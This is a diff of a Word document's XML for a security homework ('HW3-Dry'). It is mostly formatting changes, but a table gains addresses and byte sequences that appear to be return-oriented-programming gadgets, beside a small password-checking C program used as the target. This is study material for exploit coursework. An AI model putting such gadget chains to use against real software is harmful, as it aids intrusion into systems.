                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x400e71</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6912,6 +6956,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>58 c3</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6999,6 +7054,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x401da0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7019,6 +7085,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>5e 41 5f c3</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -2429,7 +2429,6 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2449,18 +2448,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t>(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2520,7 +2508,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2541,7 +2528,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2570,7 +2556,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2601,7 +2586,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2668,20 +2652,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>s;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> c = *s;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2760,7 +2732,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2781,7 +2752,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2830,7 +2800,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2851,7 +2820,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2936,20 +2904,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(c){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2996,18 +2952,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve"> &amp; 1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3019,7 +2964,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3098,7 +3042,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3119,7 +3062,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3174,20 +3116,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>+;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>          s++;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3282,20 +3212,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>sum;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> sum;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3383,7 +3301,6 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3403,18 +3320,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t>(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3452,20 +3358,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">char* copy = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>s;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>char* copy = s;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3546,7 +3440,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3567,7 +3460,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3626,7 +3518,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3647,7 +3538,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3702,20 +3592,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">     s = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>copy;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>     s = copy;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3764,7 +3642,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3785,7 +3662,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3814,7 +3690,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3835,7 +3710,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3952,18 +3826,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>'</w:t>
+        <w:t>'a'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3975,7 +3838,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4004,7 +3866,6 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4023,18 +3884,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>x</w:t>
+        <w:t>(x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4144,7 +3994,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4165,7 +4014,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4242,7 +4090,6 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4261,18 +4108,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>y &gt;</w:t>
+        <w:t>(y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4362,7 +4198,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4383,7 +4218,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4470,7 +4304,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> 26y + </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4491,7 +4324,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4518,20 +4350,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>+;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>         s++;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4626,18 +4446,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">y == </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>hash</w:t>
+        <w:t>y == hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4649,7 +4458,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5050,29 +4858,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>main(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
+        <w:t xml:space="preserve"> main(){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5115,20 +4901,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>password[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> password[</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5173,7 +4947,6 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5195,7 +4968,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5240,7 +5012,6 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5262,7 +5033,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5346,20 +5116,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>)){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(password)){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5384,7 +5142,6 @@
         <w:t xml:space="preserve">        </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5406,7 +5163,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5425,20 +5181,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>, password);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5482,7 +5226,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5503,7 +5246,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5551,7 +5293,6 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5573,7 +5314,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5584,7 +5324,6 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5595,7 +5334,6 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5637,18 +5375,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>-</w:t>
+        <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5670,7 +5397,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6826,18 +6552,7 @@
                 <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>0x</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:highlight w:val="yellow"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>4016B0</w:t>
+              <w:t>0x4016B0</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7251,6 +6966,16 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">4c 01 </w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -2429,6 +2429,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2448,7 +2449,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(char* s){</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2508,6 +2520,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
